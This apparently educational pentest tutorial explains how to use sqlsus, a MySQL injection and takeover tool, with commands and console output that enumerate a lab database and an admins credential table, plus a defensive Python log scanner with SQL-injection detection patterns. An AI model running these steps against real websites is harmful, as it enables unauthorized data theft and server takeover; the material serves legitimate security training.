SQLSus

Description

sqlsus is an open source MySQL injection and takeover tool, written in Perl.

Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more…
Whenever relevant, sqlsus will mimic a MySQL console output.

sqlsus focuses on speed and efficiency, optimising the available injection space, making the best use (I can think of) of MySQL functions.
It uses stacked subqueries and a powerful blind injection algorithm to maximise the data gathered per web server hit.
Using multithreading on top of that, sqlsus is an extremely fast database dumper, be it for inband or blind injection.

If the privileges are high enough, sqlsus will be a great help for uploading a backdoor through the injection point and taking over the web server.

It uses SQLite as a backend, which makes what has been dumped easier to work with, and integrates a lot of usual features (see below) such as cookie support, SOCKS/HTTP proxying, and HTTPS.

Usage

Syntax

sqlsus [options] [config file]

Options

         -h, --help                    brief help message
         -v, --version                 version information
         -e, --execute <commands>      execute commands and exit
         -g, --genconf <filename>      generate configuration file

Example

The sqlsus authors provide two examples:

inband : MySQL 5, no quotes allowed, inband injection.

takeover : MySQL 4, quotes allowed, FILE privilege, inband injection.

To simplify things, here is one more example:

Change Directory :

cyborg@cyborg:~$ cd /pentest/database/sqlsus/

Generate Config File  :

cyborg@cyborg:/pentest/database/sqlsus$  sudo sqlsus -g sqlsus.conf
defined(@array) is deprecated at sqlsus line 80.
	(Maybe you should just omit the defined()?)

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Configuration successfully saved to sqlsus.conf

Verify Using ls  :

cyborg@cyborg:/pentest/database/sqlsus$ ls
CHANGELOG  lib  LICENSE  README  sqlsus   sqlsus.conf

Open the Config File :

cyborg@cyborg:/pentest/database/sqlsus$ sudo gedit sqlsus.conf

Change the line our $url_start = "" so that it contains your vulnerable URL.

Get Started :

cyborg@cyborg:/pentest/database/sqlsus$ sudo sqlsus sqlsus.conf
defined(@array) is deprecated at sqlsus line 80.
 (Maybe you should just omit the defined()?)

 sqlsus version 0.7.2

 Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Session "192.168.1.15" loaded
sqlsus> start
[+] Correct number of columns for UNION : 6 (0,1,0,1,0,0)
[+] Length restriction on URL : 8200 bytes 
[+] Filling %target...
+----------+-----------------------+
| Variable | Value                 |
+----------+-----------------------+
| database | vulnerabledb          |
| user     | 'website'@'localhost' |
| version  | 5.0.95                |
+----------+-----------------------+
3 rows in set 


Get Names of Databases :

sqlsus> get databases
[+] Getting databases names
+------------+ 
| Databases  |
+------------+
|vulnerabledb|
| test       |
+------------+
2 rows in set 

Get Names of Tables:

sqlsus> get tables
[+] Getting tables names
 
<( vulnerabledb )>

 [user]
 

 [testd]
 

 [admins]

Get Names of Columns:

sqlsus> get columns
[+] Getting tables and columns names
 
<( vulnerabledb )>


 [admins]
 admin_id
 admin_username
 admin_password

Get Data:

sqlsus> select * from admins
+----------+----------------+----------------+
| admin_id | admin_password | admin_username |
+----------+----------------+----------------+
+    *     +   **********   +    ********    +
+----------+----------------+----------------+
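
Seen from the defending side, a session like the one above shows up in the web server's access log when the injection point is in the URL: UNION SELECT probes, schema enumeration (on MySQL 5 this goes through information_schema) and unusually long request targets. The Python sketch below is an added example, not part of sqlsus or of the original page; the rule patterns, the 4096-byte threshold and the sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Client IP and request target from a combined-format access-log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
GAP = r"(?:\s|/\*.*?\*/)+"  # whitespace or an inline SQL comment between keywords
# Generic indicators of the technique classes named above, not sqlsus signatures.
RULES = {
    "union_select": re.compile(rf"\bunion\b{GAP}(?:all{GAP})?select\b", re.I | re.S),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
}
LONG_URL = 4096  # assumed threshold; tune to the application's longest legitimate URL

def classify(target):
    """Return the set of rule names matched by one request target."""
    hits = {"long_url"} if len(target) >= LONG_URL else set()
    # Decode twice so double-encoded keywords (%2555nion) are inspected too.
    decoded = unquote_plus(unquote_plus(target))
    hits.update(name for name, rx in RULES.items() if rx.search(decoded))
    return hits

def scan(lines, min_hits=2):
    """Count rule matches per client IP; keep clients with at least min_hits matches."""
    per_client = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            for name in classify(m.group(2)):
                per_client[m.group(1)][name] += 1
    return {ip: dict(c) for ip, c in per_client.items() if sum(c.values()) >= min_hits}

def sample_log():
    """Constructed log lines; 192.0.2.0/24 is documentation address space."""
    fmt = '{} - - [01/Jan/2017:10:00:0{} +0000] "GET {} HTTP/1.1" 200 512'
    targets = [
        ("192.0.2.10", "/item.php?id=5"),
        ("192.0.2.66", "/item.php?id=0+UNION+SELECT+1,2,3,4,5,6"),
        ("192.0.2.66", "/item.php?id=0%20union/**/all%20select%201%20from%20information_schema.tables"),
        ("192.0.2.66", "/item.php?id=5&pad=" + "A" * 8200),
        ("192.0.2.10", "/search.php?q=trade+union+news"),
    ]
    return [fmt.format(ip, i, t) for i, (ip, t) in enumerate(targets)]

if __name__ == "__main__":
    for ip, counts in scan(sample_log()).items():
        print(ip, counts)
```

POST bodies and cookies do not appear in access logs, so this only covers injection points carried in the URL.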

©2017 Ztrela Knowledge Solutions Pvt. Ltd
